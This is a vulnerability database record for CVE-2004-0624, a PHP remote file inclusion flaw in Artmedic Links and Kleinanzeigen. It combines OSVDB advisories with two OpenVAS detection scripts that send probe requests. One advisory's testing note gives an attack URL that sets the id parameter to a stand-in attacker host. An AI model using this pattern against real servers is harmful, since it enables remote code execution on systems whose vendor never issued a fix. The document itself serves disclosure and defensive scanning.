ID CVE-2004-0624 Type cve Reporter cve@mitre.org Modified 2017-07-11T01:30:00
Description
PHP remote file inclusion vulnerability in index.php for Artmedic links 5.0 (artmedic_links5) allows remote attackers to execute arbitrary PHP code by modifying the id parameter to reference a URL on a remote web server that contains the code.
{"osvdb": [{"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "cvelist": ["CVE-2004-0624"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:11954](https://secuniaresearch.flexerasoftware.com/advisories/11954/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0412.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0384.html\n[CVE-2004-0624](https://vulners.com/cve/CVE-2004-0624)\n", "modified": "2004-06-28T07:47:45", "published": "2004-06-28T07:47:45", "href": "https://vulners.com/osvdb/OSVDB:7271", "id": "OSVDB:7271", "title": "artmedic links index.php Arbitrary File Retrieval", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0624"], "edition": 1, "description": "## Vulnerability Description\nartmedic kleinanzeigen contains a flaw that may allow a remote attacker to execute arbitrary code. With a specially crafted URL request to the 'index.php' script using the '?id' variable, a remote attacker could specify a malicious file as a parameter to execute arbitrary code on the victim's system, resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nartmedic kleinanzeigen contains a flaw that may allow a remote attacker to execute arbitrary code. 
With a specially crafted URL request to the 'index.php' script using the '?id' variable, a remote attacker could specify a malicious file as a parameter to execute arbitrary code on the victim's system, resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[victim]/artmedic-kleinanzeigen-path/index.php?id=http://[attacker]\n## References:\nVendor URL: http://www.artmedic-phpscripts.de/artmedic_kleinanzeigen.php\nSecurity Tracker: 1010740\n[Secunia Advisory ID:12099](https://secuniaresearch.flexerasoftware.com/advisories/12099/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0229.html\nKeyword: Remote File Inclusion\nISS X-Force ID: 16518\nISS X-Force ID: 16741\n[CVE-2004-0624](https://vulners.com/cve/CVE-2004-0624)\n", "modified": "2004-07-18T03:08:28", "published": "2004-07-18T03:08:28", "href": "https://vulners.com/osvdb/OSVDB:8116", "id": "OSVDB:8116", "type": "osvdb", "title": "artmedic kleinanzeigen Arbitrary Code Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-08T16:40:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0624"], "description": "Artmedic Kleinanzeigen, an email verifying PHP script,\n has been found to contain an external file inclusion vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231013654", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231013654", "type": "openvas", "title": "Artmedic Kleinanzeigen File Inclusion Vulnerability", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Artmedic Kleinanzeigen File Inclusion Vulnerability\n#\n# Authors:\n# Noam Rathaus\n#\n# Copyright:\n# Copyright (C) 2004 Noam Rathaus\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n# From: Francisco Alisson <dominusvis@click21.com.br>\n# Subject: Artmedic kleinanzeigen include vulnerability\n# Date: 19.7.2004 05:25\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.13654\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-0624\");\n script_bugtraq_id(10746);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Artmedic Kleinanzeigen File Inclusion Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2004 Noam Rathaus\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"The file inclusion vulnerability allows a remote attacker to include\n external PHP files as if they were the server's own, this causing the product to execute arbitrary code\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"Artmedic Kleinanzeigen, an email verifying PHP script,\n has been found to contain an external file inclusion vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) )\n exit( 0 );\n\nforeach dir( make_list_unique( \"/kleinanzeigen\", \"/php/kleinanzeigen\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" )\n dir = \"\";\n\n foreach file( make_list( \"/index.php\", \"/index.php3\", \"/index.php4\" ) ) {\n\n buf = http_get_cache( item:dir + file, port:port );\n if( ! buf || buf !~ \"^HTTP/1\\.[01] 200\" || buf !~ \"(Freewarescript by artmedic webdesign|Kleinanzeigen von artmedic webdesign|<title>Kleinanzeigen</title>)\" )\n continue;\n\n url = string( dir, file, \"?id=http://xx./\" );\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req );\n if( ! 
buf )\n continue;\n\n if( 'ReadFile(\"http://xx.\")' >< buf ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T16:40:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0624", "CVE-2006-4905"], "description": "Artmedic Links a links generating PHP script,\n has been found to contain an external file inclusion vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231012289", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012289", "type": "openvas", "title": "artmedic_links5 File Inclusion Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# artmedic_links5 File Inclusion Vulnerability\n#\n# Authors:\n# Noam Rathaus\n#\n# Copyright:\n# Copyright (C) 2004 Noam Rathaus\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n# From: Adam n30n Simuntis <n30n@satfilm.net.pl>\n# Subject: artmedic_links5 PHP Script (include path) vuln\n# Date: 25.6.2004 19:51\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12289\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_cve_id(\"CVE-2006-4905\", \"CVE-2004-0624\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"artmedic_links5 File Inclusion Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2004 Noam Rathaus\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"The file inclusion vulnerability allows a remote attacker to include\n external PHP files as if they were the server's own, this causing the product to execute arbitrary code.\");\n\n script_tag(name:\"summary\", value:\"Artmedic Links a links generating PHP script,\n has been found to contain an external file inclusion vulnerability.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n url = dir + \"/artmedic_links5/index.php?id=index.php\";\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req );\n\n if( buf =~ \"^HTTP/1\\.[01] 200\" && 'require(\"linksscript/include.php\");' >< buf ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}